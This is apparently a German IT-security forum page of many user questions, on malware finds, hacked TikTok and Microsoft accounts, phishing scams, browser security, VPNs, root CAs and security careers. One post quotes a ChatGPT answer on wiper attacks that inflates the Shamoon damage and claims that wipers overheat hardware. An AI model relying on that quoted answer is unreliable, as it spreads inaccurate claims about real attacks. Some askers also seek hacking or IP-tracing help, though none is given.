IT-Sicherheit – die neusten Beiträge

Ich hatte bisher immer Norton, der nie etwas angezeigt hat, und auch Windows Defender hat nichts gemeldet. Gestern Abend habe ich einfach mal Malwarebytes heruntergeladen, und es hat direkt folgendes gefunden:

Trojan.PyengyLoader

C:\USERS\KE\APPDATA\ROAMING\EBX\QT5NETWORK.DLL

Das war der allererste Scan. Kann das ein Fehlalarm sein?

Ich habe nämlich festgestellt dass die Passwörter von der Authentizificator App auch erzeugt werden, wenn ich offline bin.

(zum Beispiel beim CCC?)

Ich interessiere mich für Hacking und weiß, dass Frauen in diesem Bereich leider unterrepräsentiert sind. Jetzt hat mich aber eine Freundin gewarnt, dass ich als Frau, die gegen "woke" ist, in dieser "Community" nicht willkommen bin und mit Anfeindungen rechnen müsste, wenn ich die woken Snowflakes nicht mit ihren bevorzugten Pronomen anspreche oder so.

Das finde ich schade. Ich habe ja nichts gegen Trans Menschen, aber ich halte eben nichts von irgendwelchen erfundenen Geschlechtern und so. Und das alles sollte bei Hacking Veranstaltungen auch gar keine Rolle spielen.

Natürlich ist mir aufgefallen, dass viele CCC Mitglieder sehr links oder sogar linksextrem sind, und das in ihren Vorträgen alle wissen lassen. Aber stimmt es, dass die meisten von ihnen auch woke sind, und dass es mehr Trans "Frauen" gibt als echte Frauen? Vielleicht hat ja jemand von euch eine Hacker Veranstaltung wie den 38C3 besucht und kann berichten.

Schönen guten Tag,

bei uns auf der Arbeit wird das Gebäude saniert und ich durfte dieses Gerät mitnehmen. Wie kann ich prüfen, ob es heil ist? Können Sammler eventuell damit etwas anfangen ? Ich weiß leider nichts zu dem Gerät.

Ich denke es ist etwas Wert. Vielleicht kann ich jemanden damit eine Freude machen 😃

Ich besitze von Logitech ein Maus & Tastaturset was per Bluetooth funktioniert namens Logitech MK235 kabellos. Bis jetzt hat es auch einwandfrei geklappt.

Vorgestern habe ich über die Seite Thunderstore Mods zum Spiel Hard Bullet (VR) installiert. Heute wollte ich das Spiel anschließend starten, jedoch kam es nie zum Spielstart, auch nach Schließen und erneutem Starten des Spiels. Ich schaute bei einem Versuch auf dem Monitor, und sah, wie über die Konsole der Mod Loader verschiedene Sachen anzeigte wie etwas mit Assets und 4 Mods Loaded die ich auch eigentlich installiert hatte. Merkwürdig nur, dass das Spiel nicht starten wollte.

Ab da fing es an, dass ich einen sehr starken Lag bei der Maus und Tastatur hatte. Diese reagierten Teilweise sehr sehr spät oder auch garnicht. Ich hab ne Menge sachen probiert, wie zB Treiber neu downloaden, die Moddateien löschen, usw.

Irgendwann wurd es dann auch besser, bzw kamen die Verzögerungen seltener. Hatte die Maus ursprünöocj an den externen USB 3.0 Hub angeschlossen. Lief such reibungslos, bis auf dieses eine mal. Anschließend an den PC angesteckt, fing jedoch mehr an zu ruckeln. WIndows Defender sagt, es gäbe keinen Virus. Eben konnte ich dann wieder etwas spielen, jedoch hat die Tastatur nun komplett die Lust verloren. Diese reagiert garnicht.

Ist ein Hardreset nötig, oder eine neue Maus & Tastatur, kabelgebunden am besten? Hab nichts wichtiges drauf, den Hardreset würde ich machen. Bitte um Hilfe

Vor etwa einer Woche wurde mein TikTok-Account gehackt. Ein neues Gerät hatte sich angemeldet und ich bin ganz vielen Accounts gefolgt. Ich habe danach sofort mein Passwort geändert, alle verbundenen Geräte abgemeldet, die 2 Faktor Authentifizierung aktiviert und sehe aktuell nur noch mein eigenes Gerät in der Geräteliste. Die letzten Tage ist nichts passiert, doch heute ist es wieder passiert, dass mein Account plötzlich einer Person gefolgt ist, obwohl ich das nicht war.

Ich mache mir Sorgen, ob vielleicht doch noch jemand Zugriff hat oder sogar mein Handy kompromittiert/ gehackt ist. Ich habe keine anderen Auffälligkeiten bemerkt (z. B. bei anderen Apps), aber ich bin jetzt total unsicher.

Ich frage mich:

1. Kann jemand weiterhin in meinem TikTok-Account sein, ohne dass er bei den Geräten angezeigt wird?
2. Wenn mein Handy gehackt wäre, hätte der Hacker sich dann nicht schon längst z. B. Zugang zu anderen Apps verschafft?
3. Könnte es sich auch um Synchronisationsfehler handeln, wie sie bei TikTok manchmal vorkommen? Also das der Follower noch aus der Zeit stammt, als der Hacker zugriff auf meinen Account hatte und jetzt erst angezeigt wurde.

Ich bin echt verunsichert und hoffe, dass mir jemand helfen kann. Hat jemand Ähnliches erlebt?

Danke im Voraus für eure Hilfe!

Dieser Müll ist nicht sicher...

https://www.heise.de/news/E-Patientenakte-CCC-findet-erneut-Luecken-Gematik-reagiert-mit-Sofortmassnahme-10368642.html

Also es werden ja laufend Sicherheitslücken geschlossen. Kann es sein das irgendwann alle geschlossen sind und es 100% sicher ist?

Und wie schützt die US Regierung / US Geheimdienst ihre Daten besser als gutefrage.net oder youtube? Was machen die anders?

Wo ist da der Rechtsstaat?

Derzeit verwende ich Firefox, aber leider kann Firefox bei der Sicherheit nicht mit Chromium mithalten. Die Entwickler von GrapheneOS schreiben dazu Folgendes:

Chromium-basierte Browser wie Vanadium bieten die stärkste Sandbox-Implementierung und sind den Alternativen weit voraus. Es ist viel schwieriger, aus der Sandbox zu entkommen, und sie bietet viel mehr als nur eine Barriere, um den Rest des Betriebssystems zu kompromittieren. Die Standortisolierung setzt die Sicherheitsgrenzen um jeden Standort, der die Sandbox nutzt, durch, indem jeder Standort in eine isolierte Sandbox gesetzt wird. Dies erforderte eine umfassende Überarbeitung des Browsers, da er diese Regeln für alle IPC-APIs durchsetzen muss. Die Standortisolierung ist aufgrund von Seitenkanälen auch ohne Kompromiss wichtig. Browser ohne Site-Isolation sind sehr anfällig für Angriffe wie Spectre. Auf mobilen Geräten gibt es aufgrund des geringen Speichers, der den Anwendungen zur Verfügung steht, verschiedene Modi für die Site Isolation. Vanadium schaltet die strikte Standortisolierung ein und entspricht damit Chromium auf dem Desktop, zusammen mit der strikten Ursprungsisolierung.

Im Gegensatz zu den verfügbaren Alternativen verfügt Chromium über eine anständige Schwachstellenabwehr. Dies wird in Vanadium noch verbessert, indem weitere Abhilfemaßnahmen aktiviert werden, einschließlich solcher, die im Vorfeld entwickelt wurden, aber aufgrund von Codegröße, Speicherverbrauch oder Leistung noch nicht vollständig aktiviert sind. Zum Beispiel ermöglicht es typbasierte CFI wie Chromium auf dem Desktop, verwendet eine stärkere SSP-Konfiguration, initialisiert Variablen standardmäßig mit Null usw. Einige der Abschwächungen werden vom Betriebssystem selbst übernommen, was auch auf andere Browser zutrifft, zumindest, wenn sie keine Dinge tun, die sie kaputt machen.

[...]

Vermeiden Sie Gecko-basierte Browser wie Firefox, da sie derzeit sehr viel anfälliger für Angriffe sind und von Natur aus eine große Angriffsfläche bieten. Gecko hat keine WebView-Implementierung (GeckoView ist keine WebView-Implementierung), so dass es neben dem Chromium-basierten WebView und nicht anstelle von Chromium verwendet werden muss, was bedeutet, dass man die Angriffsfläche von zwei separaten Browser-Engines hat, anstatt nur einer. Firefox / Gecko umgehen oder lähmen auch einen großen Teil der Upstream- und GrapheneOS-Härtungsarbeit für Anwendungen. Am schlimmsten ist jedoch, dass Firefox auf Android keine interne Sandbox hat. Und das trotz der Tatsache, dass die semantische Sandbox-Schicht von Chromium auf Android über das OS-Feature isolatedProcess implementiert ist, das eine sehr einfach zu verwendende boolesche Eigenschaft für App-Service-Prozesse ist, um eine starke Isolierung zu bieten, die nur die Möglichkeit bietet, mit der App, die sie ausführt, über die Standard-Service-API zu kommunizieren. Selbst in der Desktop-Version ist die Sandbox von Firefox noch wesentlich schwächer (insbesondere unter Linux) und bietet keine vollständige Unterstützung für die Isolierung von Websites voneinander, sondern nur für den Inhalt als Ganzes. Die Sandbox hat sich auf dem Desktop allmählich verbessert, aber für den Android-Browser ist das noch nicht der Fall.

Quelle

Da mir meine Sicherheit schon wichtig ist, und ich meinen Browser eben auch für Dinge wie Paypal oder Onlinebanking verwende, bin ich auf der Suche nach einem sicheren, Chromium basierten Browser. Vanadium kommt nicht in Frage, da er leider nur für GrapheneOS verfügbar ist.

Meine Anforderungen:

• Chromium basiert
• verfügbar für GNU/Linux und/oder Android
• Unterstützung für Erweiterungen (vor allem Ublock Origin)
• (für Android) Implementierung der Android Autofill API, um Passwörter automatisch auszufüllen
• Open Source
• keine Datenkrake
• möglichst kein Bloat (Ich brauche keine Kryptowallets, VPNs oder ähnlichen Unsinn. Das vergrößert nur die Angriffsfläche)

1. Frage = Titelfrage

2. Frage: Würden Strafverfolgunsbehörden Ermittlungen aufnehmen, wenn das passieren würde?

__________

Antwort von ChatGPT:

Ein Wiper-Angriff ist ein Cyberangriff, bei dem bösartige Software, bekannt als "Wiper"-Malware, eingesetzt wird, um Daten auf einem Computersystem zu löschen oder dauerhaft zu zerstören. Im Gegensatz zu Ransomware, die Daten verschlüsselt und Lösegeld fordert, zielt der Wiper-Angriff darauf ab, Daten unzugänglich oder unbrauchbar zu machen, ohne jegliche Möglichkeit zur Wiederherstellung.

Solche Angriffe richten sich oft gegen Unternehmen, staatliche Institutionen oder kritische Infrastrukturen und können erhebliche Schäden anrichten. Sie erfolgen typischerweise durch das Einschleusen von Malware über Phishing, Sicherheitslücken oder andere Schwachstellen. Ein bekanntes Beispiel hierfür ist der Shamoon-Angriff von 2012, bei dem die Malware Millionen von Datenträgern beim saudi-arabischen Ölunternehmen Aramco zerstörte und die operativen Abläufe erheblich beeinträchtigte.

Die Funktionsweise eines Wiper-Angriffs umfasst mehrere Schritte:

1. Datenvernichtung: Die Malware löscht Daten dauerhaft, oft durch Überschreiben auf den Speichermedien, was eine Wiederherstellung nahezu unmöglich macht.

2. Überhitzung: In fortgeschrittenen Varianten der Schadsoftware wird zusätzlich eine Überlastung des Systems provoziert, etwa durch erhöhte Prozessorauslastung oder das Auslösen von Bedingungen, die die Serverhardware, insbesondere Prozessoren oder Festplatten, überhitzen und physisch beschädigen können.

Diese Art des Angriffs kombiniert Software- und Hardwaremanipulation und erfordert eine präzise Planung. Die Bekämpfung solcher Angriffe erfordert eine starke IT-Sicherheitsinfrastruktur und eine ständig angepasste Sicherheitsstrategie.

Hallo Leute !
Ich wollte euch mal fragen, welche Linux Version ihr am sichersten findet, mit der man auch noch spielen (Steam Spiele) kann.
Ich freue mich sehr auf eure Antworten!

Ich hab jetzt schon das 200 Seiten Buch "Linux Basics for Hackers" gelesen für einen Überblick aber wie mache ich jetzt konkret weiter da ich mich gerne mit Website-Sicherheit auseinandersetzen möchte. Bei welchen Webseiten , Büchern , Youtube channels bekomme ich mehr Info? Ich lerne programieren wie auch Netzwerktechnik schon durch die Schule also muss ich das nicht mehr extern machen.

Hallo, ich überlege nun zwischen zwei Bachelorstudiengängen; Bioingeneurwesen/ Biotechnologie an einer Hochschule oder Cyber Security & Privacy ebenfalls an einer Hochschule.

Zu mir: Ich bin weiblich, 21 Jahre alt und habe vor zwei Jahren mein Abitur gemacht. Derzeit studiere ich an der Fernuni Hagen, ich möchte aber wechseln. Ich hatte im Abitur Biologie 15 Punkte, zudem Geschichte LK 15 Punkte. Englisch ebenfalls 13 Punkte. Da ich allerdings sehr schüchtern war, habe ich mir meinen NC durch die mündliche Mitarbeit in „Laberfächern“ versaut (2,2).

Interesse an Biologie, Umweltthemen, aktuellen Ereignissen und Politik. Cyber Security wäre mein Ziel in den Bereich Incident Response oder Ethical Hacking zu gehen. Hier neben den guten Berufschancen (auch Selbstständigkeit) auch aufgrund des Interesses und gewisser Faszination. Allerdings keine IT oder Programmierkenntnisse (Informatik hatte ich nicht als Schulfach). Hier macht mir nur die „Bandbreite“ etwas Bedenken, viele Programmiersprachen, Mathematik, Logik, Schnelle Auffassungsgabe und ständige Neuerungen.

Bei Bioengineering wäre mein Ziel einen Master im Bereich Pharmaceutical Engineering zu machen und evt. Promotion um danach bei Pharmaunternehmen unterzukommen. Vor allem interessiere ich mich für die Gentechnik, Impfstoffentwicklung also den Forschungsbereich.

Welchen Weg würdet ihr mir empfehlen? Ich suche eine gewisse „Sicherheit“, wenn es geht natürlich auch gutes Gehalt aber wichtiger ist mir, etwas zu machen, wo ich wirklich gesellschaftlichen Mehrwert leisten kann :)

Ich habe oft Videos gesehen, in denen Leute die Tankdekel von Tesla (Teslen KA was der Plural ist). Und ich habe auch einen Flipper und möchte wissen: Ist es strafbar den Tankdekel eines Tesla mit einem Flipper Zero zu öffnen?

Hallo zusammen,

ich ziehe gerade die Einschreibung fürs Informatikstudium in Betracht und habe mich bereits intensiv mit den verschiedensten Fachrichtungen auseinandergesetzt – von klassischer Softwareentwicklung über Machine Learning bis hin zu IT‑Security . Mein größtes Interesse gilt nach wie vor dem Programmieren, allerdings wächst meine Sorge, dass einfache Coding‑Aufgaben in naher Zukunft immer stärker von KI‑Tools übernommen werden könnten.

Welche Teilgebiete oder Spezialisierungen im Informatikstudium sind eurer Erfahrung nach am widerstandsfähigsten gegenüber Automatisierung durch KI und bieten zugleich exzellente Karriere‑ und Zukunftsaussichten?

Über persönliche Erfahrungsberichte und konkrete Beispiele aus dem Berufsleben wäre ich sehr dankbar. Vielen Dank im Voraus!

Ich frage mich, ob es möglich ist, Malware auf eine Weise zu nutzen, die tatsächlich zum Schutz von Daten beiträgt. Hat jemand Erfahrungen oder Gedanken dazu?

Stimmt es eigentlich, dass es nichts bringt seine Festplatten zu verschlüsseln?

Mir hat jemand gesagt, dass für fast alle Programme irgendwelche Lücken bekannt sind bzw. zumindest Regierungen trotzdem immer alles entschlüsseln könnten und es deswegen eigentlich sinnlos ist.

Ich denke mir: ok, wenn ich jetzt Terrorist wäre, würde die Regierung vielleicht viel Geld investieren um an meine Daten zu kommen und es dann wahrscheinlich auch schaffen. Aber im Normalfall?

Vorallem, wenn es Lücken für die Regierung gäbe, wäre ja auch immer die Gefahr, das die jemand anderes findet dann könnten doch die ganzen Unternehmen die sowas produzieren direkt zu machen?

Ich habe 3 emails bekommen das ungewöhnliche anmeldeaktivtäten vorliegen. Ich habe gesehen das 2 anmeldeversuche erfolgreich waren. Was tun

Sieht snapchat den unterschied ob ich von einem snap screenshot gemacht habe oder nur vom chat also sieht snapchat wovon ich Screenshot gemacht habe

Hallo,

Für meine Arbeiten im Homeoffice suche ich ein gutes Mono-Headset. Folgende voraussetzung:

- Mit Ladestation.

- Kabellos

- Auch für unterwegs nutzbar (ohne Ladestation in der nähe)

Danke

Ich habe von diesem deutschen CTF Wettbewerb erfahren, der noch bis 1. Mai läuft: https://play.cscg.live/tasks/

Es soll auch ein paar "einfache" Challenges in den verschiedenen Kategorien geben, die für mich möglicherweise interessant wären.

Allerdings habe ich von dem Laden, der das organisiert (Nachwuchsförderung IT-Sicherheit e.V.) noch nie gehört.

Denkt ihr, das ist seriös? Was mich irritiert, ist, dass man einen Discord Account braucht, um Flags für das Scoreboard submitten zu können. Ich verwende kein Discord.

Hab schon öfter gehört, dass Linux angeblich besser sein soll. Vielleicht ist das auch rein technisch so. Aber wie ist das für mich persönlich? Lohnt sich da ein Umstieg auf Linux?

Im Moment nutze ich Windows 11. Ich muss auch sagen, ich bin nicht komplett zufrieden. Aber es ist auch noch nicht so schlimm, dass ich unbedingt sofort was anderes brauche.

Ich benutze meinen PC fast nur für Internet (recherchieren für Schule etc. Youtube usw.), Musik hören oder zocken

Wie gut würde das alles mit Linux funktionieren?

Hab auch gehört, dass obwohl Linux angeblich besser sein soll, man ständig irgendwas rumfummeln muss in der Konsole und so. Und da hab ich gar keine Ahnung von und wäre mir auch wieder zu stressig

Also was wären für mich Vor und Nachteile? Würde sich für mich Linux wirklich lohnen oder passt das für mich eher nicht?

Was genau ist das?

Wie geschieht sowas?

--> Durchs surfen auf Webseiten?

--> Durch Infizierte Downloads?

Was passiert da?

Das kann ja heute alles abgehört werden. Im Prinzip gibt es gar keine abhörsichere Kommunikation oder?

Wie machen die das?

Hallo ihr Lieben,

ich brauche unbedingt euren Rat.
Ich habe eben eine große Dummheit gemacht und zwar bin ich auf eine

Fake- Seite von Intersport reingefallen.

In der hieß es, man würde aufgrund der nicht mehr stattfindenden Zusammenarbeit mit Intersport und Deuter einen Rucksack für 1,95 € erhalten können.

Ich habe dort mitgemacht und die 1,95 € von meiner Kreditkarte abbuchen lassen. Während ich dies machte, kamen mir schon Zweifel, aber ich schloss den Vorgang ab.

Nach circa einer halbe Stunde rief ich bei meiner Kreditkarten Bank an und fragte nach, ob ich die Überweisung stoppen könnte. Sie sagte nein und wusste aber schon Bescheid, dass solche Vorfälle diesbezüglich schon oft vorgekommen sind. Ich habe nun meine Kreditkarte sperren lassen, befürchte aber, dass ich irgendein Abo abgeschlossen habe. Die nette Frau am Telefon sagte, dass die Leute nun aber keinen Zugriff mehr auf meine Daten hätten.
Leider habe ich meine Adresse eingegeben – meint ihr, dass da jemand auf einmal von meiner Tür steht und Geld verlangt? Ich habe totale Angst.

Ich hoffe, es passiert nichts und dass die Bande wirklich keinen Zugriff mehr auf mein Konto hat. Wer hat ähnliches erfahren und kann mich ein wenig beruhigen ?

Ich danke euch

Hallo! Ich hatte vor kurzem einen Fund vom Windows Defender, allerdings ist er mir erst gestern aufgefallen obwohl die Datei bereits am 18.03.2025 entdeckt wurde es handelt sich um folgenden Fund:

Ich verstehe nur leider nicht, wie dieses Programm auf meinen Rechner gekommen ist. Ich habe den Download-Ordner überprüft, die Download-Historie meiner Browser überprüft sowie meinen Verlauf auf beiden Webbrowsern. Ich habe keine ungewöhnlichen Seiten besucht, nichts heruntergeladen um das Datum herum und auch keine Extensions installiert.

Ich habe meinen Netzwerktraffic mit Wireshark geprüft, nichts Verdächtiges. Ohne von mir geöffnete Programme nur die üblichen Handshakes, Standard-Queries und Windows-Update-bezogene Prozesse, welche ich auch alle auf legitime Quellen zurückführen kann.

Da die Schadware noch gezippt war, als sie gefunden wurde, wurde sie wohl nicht ausgeführt. Ich habe mehr als fünfmal Virenscans seitdem durchgeführt mit Windows Defender, Malwarebytes sowie HitmanPro. Nichts gefunden. Meine Accounts sind nicht komprimiert, Passwörter zur Sicherheit geändert. Ich habe typische Prozesse, die gerne zu Maskierungen verwendet werden, mit dem Process Explorer geprüft. Alle aktiven Prozesse waren in den korrekten Verzeichnissen und Virustotal-Scans bestätigten, dass es sich um legitime Windows-Prozesse handelt.

Die Datei oben wurde entfernt, aber ich bin mir trotzdem nicht sicher, wo genau die Sicherheitslücke denn war. Weiß jemand, was ich tun kann, um das weiter zu verfolgen?

Hallo zusammen,

ich habe ein Raspberry Pi 4 B und dazu eine 3,5'' HDD von WD mit NAS Optimierung, wodurch sie für den 24/7 Gebrauch ausgelegt ist hab ich mir sagen lassen. Diese beiden Geräte verbinde ich über einen SATA auf USB 3.0 Adapter mit einer externen Stromversorgung für die Festplatte.

Die ganze Konstruktion soll als FTP-Server für Überwachungsaufnahmen dienen, welcher 24/7 im Einsatz sein wird.

Ich habe viel Kritik dafür ausgesprochen bekommen, kann jemand vom Fach sagen, ob das Ganze funktionieren würde und ob es bestimmte Dinge gibt, die ich beachten sollte.

Mir wurde schon gesagt, dass die HDD eine externe Stromversorgung haben sollte und auf NAS optimiert sein sollte. Zudem sollte der Pi genug Lüftung haben und auch eine vernünftige Stromversorgung. Auf diese Hinweise habe ich die Planung bereits angepasst. (ggf. hatte ich die Idee, das Ganze mit Ethernet zu verbinden, auch gerne eine Meinung dazu.)

Es wäre also nett, wenn mir jemand sagen kann, ob das so alles passt, ob es überhaupt eine gute Idee ist, was ich alles beachten muss etc.

Vielen Dank und viele Grüße.

Ich hoffe alle kennen das Browser-Addon uBlockOrigin (uBO), mit dem man effektiv Tracker und Werbung im Browser blockieren kann.

Dabei führt der Adblocker schon sehr sinnvolle Blocklisten mit, welche habt ihr aktiviert und habt ihr womöglich gar eigene Blocklisten noch hinzugefügt?

Ich habe mir schon Kali linux installiert und mit Nmap experimentiert aber mittlerweile helfen YouTube Tutorials nicht mehr und ich frage mich wie richtige Hacker das gelernt haben weil nichts im Internet wirklich nützlich ist. Wo finde ich z.B PIN Cracking Tutorials für Windows oder wie ich einen Virus programmiere ? Muss man das ich Darknet lernen??

Ich bin an dem Punkt nun angekommen, an dem ich für meine Zukunft entscheide.
Ich habe mich schon für eine Ausbildung beworben, jedoch wurde ich für das weitere Auswahlverfahren abgeworben.

Ich bin dann auf das Studium IT-Sicherheit gestoßen und es hat meine Interesse geweckt.

Gibt es hier zufällig Menschen, die solch ein Studium angefangen oder auch abgeschlossen haben? Würdet ihr es weiterempfehlen, wenn ja/nein warum?

Weshalb habt ihr euch dafür entschieden?

Ich habe ein Problem mit der Bitlocker Browsererweiterung. Und zwar will ich nicht immer das Master-Passwort eingeben, sondern einfach wenn ich im browser bin mit biometrie verifizieren. Nun wollte ich dies aktivieren, setzte den Haken in den Einstellungen, die Erweiterung schloss sich und nun kann ich es nicht mehr auswählen, aber aktiv ist es auch nicht.

Und dass die Bitwarden Desktop-App geschlossen ist, stimmt nicht. Ich habe sie offen und entsperrt.

Hallo, ich habe mir gebraucht eine apple watch series 5 gekauft und sie heute versucht einzurichten, aber obwohl ich diese jetzt schon einmal zurückgesetzt habe und sie es davor auch schon war, lassen sich darauf keine Apps installieren. Im App menu gibt es auch den App Store nicht auf der Uhr.
dann habe ich es über die wagch app auf meinem iphone 12 versucht und mir wird jedes mal diese Fehlermeldung angezeigt:

Mein Handy wird aber von keinem Administrator verwaltet und meine Apple watch zeigt da auch nichts in den Einstellungen an. Ich bin auch nicht in einem Familienaccount und ich habe die apple watch auch für kein Kind eingerichtet und benutze keine Bildschirmzeit oder sonstige Einschränkungen.

Ich würde mich sehr über Ratschläge und Tipps freuen wie ich das Problem lösen könnte, es ist nämlich total frustrierend.

Liebe Grüße!

Es gibt Anwensungsfälle, in denen ein VPN durchaus sinnvoll ist, aber leider sind viele kommerzielle VPN Anbieter für irreführende Werbung bekannt.

• Ein VPN schützt Nutzer nicht vor Schadsoftware.
• Ohne VPN Verbindung können in öffentlichen Netzwerken keine Passwörter, Bankdaten oder irgendwelche anderen Inhalte entwendet werden, da heute praktisch alles TLS verschlüsselt ist.
• Viele VPN Anbieter behaupten, keine Logs zu speichern, tun es dann aber auf Anfrage von Regierungsbehörden doch.

Offensichtlich wird hier mit Panikmache versucht, eine Dienstleistung zu verkaufen, die die meisten Internetnutzer gar nicht brauchen.

https://www.youtube.com/watch?v=WVDQEoe6ZWY

Wie steht ihr zu solchen irreführenden Aussagen? Haltet ihr sie für notwendig, da sie in der Branche üblich geworden sind, oder findet ihr, dass VPN Werbung ehrlicher werden sollte?

Hallo an alle, ist es heutzutage so das quasi schon so jugendliche oder teenager oder sonst wer der nicht viel Ahnung hat von Hacken, irgend nh platform zu hacken?
oder sich das wissen schnell anzueignen?

Ein Konto für diverse Dienste/Onlineshops zu erstellen geht ja ruck zuck, aber eines zu löschen ist meistens das komplette Gegenteil, insbesondere wenn es keinen Lösch-Button auf der Accountseite gibt.

Öfters muss man mit dem Kundendienst schreiben, teils bekommt man gar auch keine Antwort und manchmal muss man sogar Beschwerde bei der Datenschutzbehörde einbringen (langwierig).

Löscht ihr regelmäßig eure ungenutzen Accounts oder "vergesst" ihr sie einfach?

Im Sommer beginne ich eine Ausbildung bei der Bank. Computerkenntnisse habe ich nicht wirklich, außer die Sachen, die man auch auf dem Handy machen kann. Selbst heruntergeladene Dateien auszupacken fällt mir schwer.

Ich will mich daher an einer Volkshochschule bis zum Sommer diesbezüglich fit machen. Allerdings werden die Kurse in verschiedenen Aspekten angeboten und nicht als ganzes. Von daher, welche der folgenden Kurse sind vonnöten um in der Bank zu arbeiten (Bankkaufmann)?

- Grundlagen

- Einführung (60+)

- IT Sicherheit

- Office Kombinationskurs

- Betriebssysteme

- Excel

- Access

- Word

- Outlook

- PowerPoint

- Internet

- Bild und Ton

- smart und mobil

- Fotografie

- Programmierung

Bitte nur Antworten derer, die es auch wissen durch Berufs-/Ausbildungserfahrung oder die sich zu wirklich sicher sind, und keine Schätzungen. Vielen Dank!

Hallo, gestern Nacht wollten mich 2 Leute scammen, einer meinte er wäre im Wert von 4 tausend Euro gescammt worden und der andere hat sich als Steam Support ausgegeben, ich würde gerne wissen ob und wie es möglich ist deren io Adresse herauszufinden,einfach nur um ihnen Angst zu machen, könnte mir vielleicht jemand dabei helfen?

Bekomme von Microsoft ein paar mal einen Code per Mail zugeschickt obwohl ich mich selber nicht einloggen wollte, das letzte mal vor 15 Minuten. Das passierte seit gestern 3-4 mal oder so, glaube da will mir irgendein skid den account wegnehmen hahah.

Meint ihr jemand versucht mich zu hacken oder ist das so eine technische Störung bei Microsoft?

Sehr geehrte Damen und Herren,

mein Name ist Mathieu, und ich beschäftige mich derzeit für ein Schulprojekt mit der Funktionsweise von Deepfakes. Könnten Sie mir bitte erklären, wie genau diese Technologie funktioniert und welche Prozesse dabei im Hintergrund ablaufen? Ich würde mich freuen, wenn ein Experte mich bei diesem Thema unterstützen könnte, um ein tieferes Verständnis zu erlangen.

Vielen Dank im Voraus für Ihre Zeit und Unterstützung.

Mit freundlichen Grüßen

Mathieu

Ich habe mich gefragt ob man "einfach" oder eher schwieriger C++ Programme oder Apps hacken kann.

Hallo zusammen,

ich nutze regelmäßig ChatGPT und gebe dort für meine Anfragen auch gelegentlich Daten über mich preis. Und da frage ich mich jetzt: Wie viel speichert OpenAI davon und über mein Nutzungsverhalten (außerhalb von der "Errinerungen" Funktion) ab?

Hallo! :D Als Hobbymusiker möchte ich meine Songs mit meinen Kollegen teilen - und sie ihre mit mir. Deswegen habe ich schon seit längeren bei MagentaCloud eine Cloud mit 3 GB Speicherplatz.

Allerdings habe ich vor kurzem ein duales Studium in der IT angefangen und fuchse mich gerade selbst in das Thema Cloud rein. Da habe ich mitbekommen, dass es das OpenSource-Projekt Nextcloud gibt. Und da dachte ich mir, dass es mega cool wäre, eine eigene Cloud zu haben, mit mehr Speicherplatz und mehr Kontrolle.

Ich habe ein Tutorial gesehen, wie man auf einem Rechner Proxmox installiert, darauf einen Container erstellt und darauf Nextcloud installiert. Dann wurde beim Router etwas umgestellt und dann mit einer öffentlichen IP die Cloud vom Internet aus zugänglich gemacht.

Jetzt meine Frage: Ist das sicher genug? Bin ich vor Hackingangriffen geschützt? Es sah so einfach aus, möchte aber nicht, dass meine Daten bzw. mein Heimnetz angegriffen wird. Leider fehlt mir noch ein bisschen Erfahrung, dda mich das Thema aber interessiert, wöllte ich dahingehend mal ein Projekt machen...

Vielleicht habt ihr einen Homeserver? Wie habt ihr das gemacht?

Was meint ihr dazu?

Kam eben im TV auf Phoenix. Ein Sicherheitsexperte haute den raus.

"Wenn 2 Leute von einen Bären angegriffen werden, muss man nicht so schnell rennen wie der Bär, sondern nur schneller als der andere!"

*grübel*

Ging um Cybersicherheit am Flughafen und überwindung der Sicherheitssysteme, durch Hacker.

Aber finde des Spruch echt cool!

Firefox hat 159 vorinstallierte Root CAs, viele davon wirken nicht gerade vertrauenswürdig. Zum Beispiel:

• China Financial Certification Authority (CFCA)
• Chunghwa Telecom
• Global Digital Cybersecurity Authority Co., Ltd. (Formerly Guang Dong Certificate Authority (GDCA))
• Government of Hong Kong (SAR), Hongkong Post, Certizen
• Government of Spain, Autoritat de Certificació de la Comunitat Valenciana (ACCV)
• Government of The Netherlands, PKIoverheid (Logius)
• Government of Turkey, Kamu Sertifikasyon Merkezi (Kamu SM)
• iTrusChina Co., Ltd
• Shanghai Electronic Certification Authority Co., Ltd.
• Taiwan-CA Inc. (TWCA)

Das Problem mit diesen Root CAs ist, dass sie gefälschte Zertifikate ausstellen können, um MiTM Angriffe für beliebige Webseiten durchzuführen (trotz TLS/SSL). Dass einige dieser CAs von Regierungen undemokratischer Länder wie China oder der Türkei kontrolliert werden, die dafür bekannt sind, Hackerangriffe gegen politische Gegner durchzuführen, finde ich äußerst besorgniserregend.

Ich habe deshalb die meisten Root CAs auf meinen Geräten deaktiviert. Ich denke aber, dass sich viele Menschen gar nicht damit beschäftigen und einfach alle vorinstallierten CAs aktiviert lassen.

Wie macht ihr das, und warum?

Hallo

Man kann ja hier irgendwie überprüfen ob die email adresse irgendwie opfer eines datendiebstahls ist.

Was bedeutet das genauer, wenn das anschlägt?

Heißt das dann dass jemand auf die email adresse zugriff hat? Oder "nur" dass diese betrügern bekanmt ist, die einem dann scam emails schicken?

WhatsApp, Instagram, Facebook etc. haben alle unsere persönlichen Daten, auch wenn wir Cookies akzeptieren. Diese Daten werden weiterverkauft, aber wieso sind diese Daten so wertvoll?

Was wollen die überhaupt mit unseren Daten?

Ist es wirklich NUR wegen personalisierter Werbung? Aber wen juckt werbung?

Bin noch Einsteiger, und möchte mir selbst hacken bzw Cybersecurity beibringen. Welches Buch bzw welche Bücher sollte ich definitiv gelesen haben?

Ich habe gerade eben mit einem auf instagram gechatted, den ich kennengelernt habe, er hat gesagt dass er meine telefonnummer hat obwohl ich sie ihm nicht geschrieben habe, kann er damit was schlimmes machen?

Hallo Technik-Freaks,

kurze Frage. Ich gehe gerade an meiner alten E-Mail Adresse paar E-Mails durch.

Mir ist aufgefallen, dass ich sehr viele Spam Betrug E-Mails erhalten habe, die auch natürlich im Spam Ordner gelandet sind. Ich war gerade fleißig dabei diese zu löschen. Bis mir aufgefallen ist, dass in den Betreff von diesen E-Mails - tatsächlich meine Passwörter drin standen. Normalerweise lösche ich einfach solche Spam Mails. Aber da ich gerade meine Passwörter zu sämtlichen Accounts in den Betreff sehe - Frage ich mich gerade ernsthaft wie geht das ?! Und muss ich jetzt befürchten das - wenn es nicht schon passiert ist - meine Accounts in Gefahr sind ?!

Vielleicht ist hier ein Technik Freak unter uns aus der IT oder so - der sagen kann was man jetzt am besten machen kann, außer Passwörter von sämtlichen Accounts ändern natürlich.

Danke

Ich wollte mal auf einem alten Rechner (stammt aus 2007) Windows Vista installieren um mit MyPal und nem Avast Free Antivirus für einen Tag zu surfen und zu schauen ob und welche Viren man sich bei dieser Nutzung einfangen kann.

